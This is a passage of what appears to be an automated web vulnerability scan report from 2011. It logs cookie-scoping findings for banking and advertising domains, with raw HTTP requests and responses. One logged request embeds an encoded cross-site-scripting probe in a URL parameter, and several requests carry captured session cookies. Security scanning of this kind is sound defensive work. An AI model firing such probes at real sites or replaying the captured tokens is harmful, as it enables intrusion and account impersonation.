GET /r/beacon?b2=gX2iQOUxtnHmRU47KaHireBgXSml7iqTWpMq6sC-bkfBLD_8Bpm0tGlg0hKb4nkI99t0_v7dGOPLnScMot5haQ&cid= HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; pf=V_hBBoSZrvzxwVsylnKaXvamneyvQhRVH4dyk1q1DU-JwV9kSIzX4BtZ7vBDkFqiiL8UzCzja6AU_RwAB28KJ34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccounts.aspx HTTP/1.1 Host: resources.cardmemberservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 170 Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://online.cardmemberservices.com/MyAccounts.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com Date: Wed, 02 Feb 2011 22:02:19 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://online.cardmemberservices.com/MyAccounts.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccounts.aspx HTTP/1.1 Host: resources.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 162 Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://chaseonline.chase.com/MyAccounts.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:19 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://chaseonline.chase.com/MyAccounts.aspx">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: s.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: s.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/resetIDScreen.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000s0eMf9y2EnRfOFlN2C8I1eP:13k5uohoo; Path=/ Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/resetPasscodeScreen.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000kF4ME17cVzwHT7rf0vMZses:13k5uolvs; Path=/ Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/signon.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000xqKx0Pm6KLlxeiVVja8EmdE:13k5uoqt5; Path=/ Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Thu, 03 Feb 2011 01:04:58 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Location: pbl.asp Content-Length: 128 Content-Type: text/html Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=BDCPFOICCKLENOGJKIBLOLMG; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: stg.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: stg.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /i?siteID=429&ts=1296684340039&location=http%3A%2F%2Fwww.bankofamerica.com%2Ffindit%2Ferror.cgi%3FBOA_0020%3D20110202%3A0%3AO%3A5067fc0c-5451-405a-bffc3c21dd627de9%26state%3Dfalse%26BA_0021%3Dfalse&tagv=4.3&tz=-360&r=http%3A%2F%2Fwww.bankofamerica.com%2Fvehicle_and_personal_loans544ce%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E45ae18a6011%2Findex.cfm&title=Bank%20of%20America%20%7C%20Please%20Try%20Again&cd=16&ah=1156&aw=1920&sh=1200&sw=1920&pd=16 HTTP/1.1 Host: tc.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica.com/findit/error.cgi Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21
Response
HTTP/1.1 200 OK Cache-control: no-cache, private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Wed, 02 Feb 2011 22:04:41 GMT Last-Modified: Wed, 02 Feb 2011 22:04:41 GMT P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE" Set-Cookie: TCID=0007ae71-9ad3-3b5c-9719-884700000028;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:04:41 GMT; Connection: Keep-Alive Content-Length: 43 Content-Type: image/gif Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:04:42 GMT;path=/;domain=bankofamerica.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c?siteid=429&ccID=BOA_HOME_SIGNON_SERVICE_01&ccID=BOA_HOME_SIGNON_SERVICE_02&ccID=BOA_HOME_SIGNON_SERVICE_03&ccID=BOA_HOME_SIGNON_HERO&location=https%3A%2F%2Fwww.bankofamerica.com%2Fhomepage%2Foverview.go%3FBOA_0020%3D999%26tc_lang%3Den_US%26state%3Dnull%26BA_0021%3Dnull%26BOA_HPR%3Dnull HTTP/1.1 Host: tc.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-control: no-cache, private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Wed, 02 Feb 2011 22:02:37 GMT Last-Modified: Wed, 02 Feb 2011 22:02:37 GMT P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE" Set-Cookie: TCID=0007ae71-99a3-d958-8d17-88470000005a;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:02:37 GMT; Connection: Keep-Alive Content-Length: 563 Content-Type: text/javascript; charset=ISO-8859-1 Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:02:38 GMT;path=/;domain=bankofamerica.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: translate.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:04 GMT Expires: Thu, 03 Feb 2011 01:05:04 GMT Cache-Control: private, max-age=86400 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: PREF=ID=1bec15895da74ab0:TM=1296695104:LM=1296695104:S=GaVtpWsLtBVoNxSV; expires=Sat, 02-Feb-2013 01:05:04 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /translate_t?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1 Host: translate.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:02 GMT Expires: Thu, 03 Feb 2011 01:05:02 GMT Cache-Control: private, max-age=86400 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: PREF=ID=25ad30bb14812802:TM=1296695102:LM=1296695102:S=SmhVQvsJtj0-g9k_; expires=Sat, 02-Feb-2013 01:05:02 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?country=us&ep=v_gg_new&akamai=true HTTP/1.1 Host: usa.visa.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: video.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Thu, 03 Feb 2011 01:05:06 GMT Expires: Thu, 03 Feb 2011 01:05:06 GMT Cache-Control: private, max-age=0 Set-Cookie: PREF=ID=451bdac0aa428edb:TM=1296695106:LM=1296695106:S=qUfuqTtbKJhEKHvk; expires=Sat, 02-Feb-2013 01:05:06 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: VSFE_1.0 X-XSS-Protection: 1; mode=block Connection: close
<!doctype html> <meta content="text/html; charset=UTF-8" http-equiv=content-type> <meta content="Search millions of videos from across the web." name=description> <title>Google Videos</title> <script> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/stories/2011/01/20/3117032.htm HTTP/1.1 Host: www.abc.net.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Cache-Control: max-age=300 Expires: Thu, 03 Feb 2011 01:10:09 GMT Date: Thu, 03 Feb 2011 01:05:09 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: ABCGuestID=24.143.206.110.73161296695109607; expires=Thu, 03-Feb-2011 01:35:09 GMT; path=/; domain=abc.net.au Content-Length: 41425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" xmlns="http://www.w3.org/1999/xht ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rural/news/content/201102/s3126694.htm HTTP/1.1 Host: www.abc.net.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Cache-Control: max-age=300 Expires: Thu, 03 Feb 2011 01:10:08 GMT Date: Thu, 03 Feb 2011 01:05:08 GMT Content-Length: 10862 Connection: close Set-Cookie: ABCGuestID=24.143.206.110.73161296695108706; expires=Thu, 03-Feb-2011 01:35:08 GMT; path=/; domain=abc.net.au
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"> <html> <head>
<title>Tuna industry seeks lift in quotas, after boom se ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /creditcards/index.cfm?template=manage_card&RequestTimeout=120 HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:35:17 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CCPATH=Affiliate; path=/; domain=.bankofamerica.com; Set-Cookie: CONTEXT=; expires=Mon, 03-Jan-2011 22:35:11 GMT; path=/; Set-Cookie: TRACKING_CODE=; path=/; Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:22 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=132934232; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=4303b0d%2D0003b41a%2Dd4aa%2D1d49%2Da6b8%2D83deedcb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; expires=Tue, 02-Aug-2011 00:00:00 GMT; path=/; domain=.bankofamerica.com; Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; path=/; domain=.bankofamerica.com; Connection: close Set-Cookie: BIGipServerngen-www.80=3064379051.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
